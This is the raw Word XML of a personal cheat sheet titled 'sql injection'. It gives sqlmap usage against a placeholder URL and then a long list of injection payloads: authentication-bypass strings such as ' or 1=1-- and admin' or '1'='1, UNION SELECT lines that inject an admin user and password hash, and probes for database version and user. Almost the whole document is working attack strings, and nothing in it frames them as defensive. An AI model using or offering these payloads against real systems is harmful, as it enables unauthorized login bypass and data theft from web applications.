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12735" w14:textId="0D8436D8" w:rsidR="008643B3" w:rsidRPr="008643B3" w:rsidRDefault="008643B3" w:rsidP="008643B3">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="008643B3">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>sql injection</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="210A5A71" w14:textId="056BA421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1. sqlmap </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="19BC8B9A" w14:textId="7C17213B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8643B3">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>sqlmap --wizard</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6437446E" w14:textId="1E62C1C2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8643B3">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>sqlmap-u "http://the url u want to inject with the id " --batch</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="09B33C02" w14:textId="4DAFE38D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8643B3">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>example: sqlmap-u "http://192.168.0.0/room.php?cod=1" --batch</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="52594F54" w14:textId="57DD96B5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2.</w:t>
      </w:r>
      <w:r w:rsidRPr="008643B3">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="008643B3">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>'-'</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="474527A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'</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="430E045C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'&amp;'</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0BCA121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'^'</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6224DFEF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'*'</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3BAFBD0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''-'</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5FF369EB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'' '</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="183334F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''&amp;'</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7F82A97C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''^'</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="52ACF321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''*'</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4FF82735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"-"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7E04FD8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"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="207E5B97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"&amp;"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2A8C70F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"^"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="68D6AE03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"*"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0EDE93B7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""-"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0BD5992B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"" "</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1C61B741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""&amp;"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6BBFE7AA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""^"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3C2767A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lastRenderedPageBreak/>
        <w:t>" or ""*"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4EC07E75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or true--</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="49C033F5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"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true--</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6D96159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true--</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="31C74F0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") or true--</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="462F54BF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true--</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="20D30CB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'x'='x</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5B9C70F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('x</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="008643B3">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>')=</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="008643B3">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>('x</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1BA6D0C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')) or (('x'</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="008643B3">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>))=</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="008643B3">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>(('x</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="69A457B4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"x"="x</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="60C5866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") or ("x</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="008643B3">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>")=</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="008643B3">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>("x</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="14C3155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")) or (("x"</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="008643B3">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>))=</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="008643B3">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>(("x</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1B1642E3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or 1=1</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4010AC3F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or 1=1--</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5AACC60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or 1=1#</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3136C06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or 1=1/*</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1C802DE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 --</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7C6D9B6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 #</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="13EFD03B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admin'/*</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="72142D3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 or '1'='1</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0B168EC4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 or '1'='1'--</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7B6FA049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 or '1'='1'#</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0464FB5F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 or '1'='1'/*</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="310C1FE3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proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="008643B3">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>admin'or</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="008643B3">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve"> 1=1 or ''='</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3930200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lastRenderedPageBreak/>
        <w:t>admin' or 1=1</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0649A13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 or 1=1--</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="51BA40F9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 or 1=1#</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="715B7EA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 or 1=1/*</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5E17941A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admin') or ('1'='1</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4999A0F5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admin') or ('1'='1'--</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="25C0A5FB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admin') or ('1'='1'#</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6AAC52E4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admin') or ('1'='1'/*</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6FF4E45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admin') or '1'='1</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="20E8026C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admin') or '1'='1'--</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7FB19A9C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admin') or '1'='1'#</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5B854769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admin') or '1'='1'/*</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="231160FC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1234 ' AND 1=0 UNION ALL SELECT 'admin', '81dc9bdb52d04dc20036dbd8313ed055</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6CC27537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 --</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7B17BEBB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 #</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="58FD0099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admin"/*</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7D0CC06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 or "1"="1</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6D3D180F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 or "1"="1"--</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5BD0FAF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 or "1"="1"#</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7B380DB9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 or "1"="1"/*</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="30735D0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proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="008643B3">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>admin"or</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="008643B3">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve"> 1=1 or ""="</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="54C5BCD3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 or 1=1</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="40E9C33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 or 1=1--</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="62F309A4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 or 1=1#</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="20C5D1AA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lastRenderedPageBreak/>
        <w:t>admin" or 1=1/*</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="60092E9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admin") or ("1"="1</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5B4E1E4A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admin") or ("1"="1"--</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5EECF43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admin") or ("1"="1"#</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4362D5E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admin") or ("1"="1"/*</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="41B5B20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admin") or "1"="1</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="727C651A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admin") or "1"="1"--</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="293F821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admin") or "1"="1"#</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="046F937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admin") or "1"="1"/*</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4779ED0A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1234 " AND 1=0 UNION ALL SELECT "admin", "81dc9bdb52d04dc20036dbd8313ed055</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2B876F2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==</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="05C0E353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=</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="53DD8FB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</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="75DE370A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--</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="68F26E3F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#</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="377C4B37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–</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="365E5F23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'--</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5D74999B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'/*</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5D35AB9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'#</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6F05C435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--</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4B45101A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#</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3387902F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"/*</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="72B333A3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</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="008643B3">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>and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1='1</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5FD0E8E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</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="008643B3">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>and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a='a</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6C82D28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lastRenderedPageBreak/>
        <w:t xml:space="preserve"> or 1=1</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="71D3A097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 or true</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5EC4C45A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''='</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3DADA88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""="</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4A2647B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1′) and '1′='1–</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3999EBB5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AND 1=0 UNION ALL SELECT '', '81dc9bdb52d04dc20036dbd8313ed055</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="60F44961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AND 1=0 UNION ALL SELECT "", "81dc9bdb52d04dc20036dbd8313ed055</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="16B00B2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 and 1=1</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7AA85C69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 and 1=1–</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="27EE1D69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and 'one'='one</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="74EB02F5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and 'one'='one–</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="76DD6B95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</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="008643B3">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>group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by password having 1=1--</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="277539A1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</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="008643B3">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>group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by </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="008643B3">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>userid</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="008643B3">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve"> having 1=1--</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="57308AC3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</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="008643B3">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>group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by username having 1=1--</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7C483A4C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 like '%'</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="79F15F2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 or 0=0 --</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3BDD655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 or 0=0 #</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="37869227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 or 0=0 –</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="40A1B53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        0=0 #</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="16B0D62B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0=0 --</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1915006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0=0 #</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="55BCF53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0=0 –</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4D170BC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"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0=0 --</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="082AB26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"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0=0 #</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6909B66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lastRenderedPageBreak/>
        <w:t xml:space="preserve">"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0=0 –</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="34A6BF9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%' or '0'='0</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7C100214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 or 1=1</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0D2CA265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 or 1=1--</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="045EAA2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 or 1=1/*</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3EB33DA4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 or 1=1#</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7D508661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 or 1=1–</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="15403439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1=1--</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5B20214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'1'='1</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7AA9B84B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'1'='1'--</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5C10201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'1'='1'/*</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="71ABDC2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'1'='1'#</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6929E78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'1′='1</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="07A36589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1=1</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="227ADD3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1=1 --</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5E84388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1=1 –</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="117A695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1=1--</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="20271814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1=</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="008643B3">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>1;#</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
    </w:p>
    <w:p w14:paraId="16D36DF7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1=1/*</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="482E672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1=1#</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="37376B5A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1=1–</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="641E3A07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'1'='1</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="76A512A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'1'='1--</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="35CA8BE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'1'='1'--</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="36651B85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lastRenderedPageBreak/>
        <w:t>') or '1'='1'/*</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5FDD7C8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'1'='1'#</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4F00391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('1'='1</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="569BEC1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('1'='1--</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="36BD376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('1'='1'--</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1403265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('1'='1'/*</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="57E37D4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('1'='1'#</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4D48D45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'or'1=1</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7E061FFB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'or'1=1′</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4C05EA5A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"1"="1</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="19FC567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"1"="1"--</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="008CD511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"1"="1"/*</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="35D6A081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"1"="1"#</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="05D8389A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"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1=1</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="530032A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"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1=1 --</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="49A502AB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"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1=1 –</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5A64429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"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1=1--</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="535ABCD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"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1=1/*</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5B0A9FB3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"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1=1#</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="419D86F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"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1=1–</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="534EC17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") or "1"="1</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0F61AE8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") or "1"="1"--</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="31705964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") or "1"="1"/*</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3E221297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") or "1"="1"#</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3C300CB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lastRenderedPageBreak/>
        <w:t>") or ("1"="1</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1A64848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") or ("1"="1"--</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1D3BE8EF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") or ("1"="1"/*</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1E63E8C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") or ("1"="1"#</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="79E5C67F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) or '1′='1–</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7EFCFCC8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)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('1′='1–</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4A7A6E3B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or 1=1 LIMIT </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="008643B3">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>1;#</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
    </w:p>
    <w:p w14:paraId="55E3A4B9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1=1 or ''='</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="19333E8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1=1 or ""="</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5DF1808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'a'='a</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="14DD8914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a=a--</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="11E06E4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a=a–</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="69F455F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('a'='a</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5D93B8D4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"a"="a</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="072688C4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") or ("a"="a</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6C59825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') or ('a'='a and hi") or ("a"="a</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="40E969B1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'one'='one</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="55888656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'one'='one–</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="719685A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643B3">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>uid</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="008643B3">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve"> like '%</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="36934864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643B3">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>uname</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="008643B3">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve"> like '%</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4B4CF89F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643B3">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>userid</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="008643B3">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve"> like '%</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="62EAD2DC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user like '%</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="65A83FB9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username like '%</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="02A19B7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'x'='x</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0CD4DB80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lastRenderedPageBreak/>
        <w:t>') or ('x'='x</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5CF57FBD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" or "x"="x</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="51325602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OR 'x'='x'#;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="131A6BE9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'=' 'or' and '=' 'or'</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="77AA93AC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UNION ALL SELECT 1, @@</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="008643B3">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>version;#</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
    </w:p>
    <w:p w14:paraId="65F01901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UNION ALL SELECT </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="008643B3">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>system_user</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="008643B3">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>(</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="008643B3">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>),user</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="008643B3">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>();#</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="46FC2E61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UNION select </w:t>
